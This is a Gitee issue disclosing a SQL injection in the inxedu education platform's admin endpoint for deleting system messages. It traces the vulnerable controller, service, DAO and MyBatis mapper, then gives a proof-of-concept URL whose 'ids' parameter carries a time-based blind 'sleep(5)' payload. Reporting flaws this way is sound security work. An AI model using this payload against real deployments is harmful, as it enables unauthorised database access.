668 Star 1.6K Fork 826

因酷 / inxedu

 / 详情

sqlinjection3

Backlog
Opened this issue  
2020-12-12 11:44
  1. Vulnerability analysis
    the vulnerability code location:
    com/inxedu/os/edu/controller/letter/AdminMsgSystemController.java#delsystemmsg

输入图片说明
it calls:
com/inxedu/os/edu/service/impl/letter/MsgSystemServiceImpl.java

输入图片说明
com/inxedu/os/edu/dao/impl/letter/MsgSystemDaoImpl.java
输入图片说明
inxedu use Mybatis, the logic is in mybatis/inxedu/letter/MsgSystemMapper.xml
输入图片说明
2. POC
http://127.0.0.1:8080/admin/letter/delsystem/?ids=1,(select*from(select(sleep(5)))a)
输入图片说明
输入图片说明

Comments (0)

fly created任务
fly set related repository to 因酷/inxedu
fly changed description
展开全部操作日志

Sign in to comment

状态
Assignees
Milestones
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
Branches
Planed to start   -   Planed to end
-
Top level
Priority
参与者(1)
Java
1
https://gitee.com/inxeduopen/inxedu.git
git@gitee.com:inxeduopen/inxedu.git
inxeduopen
inxedu
inxedu

Search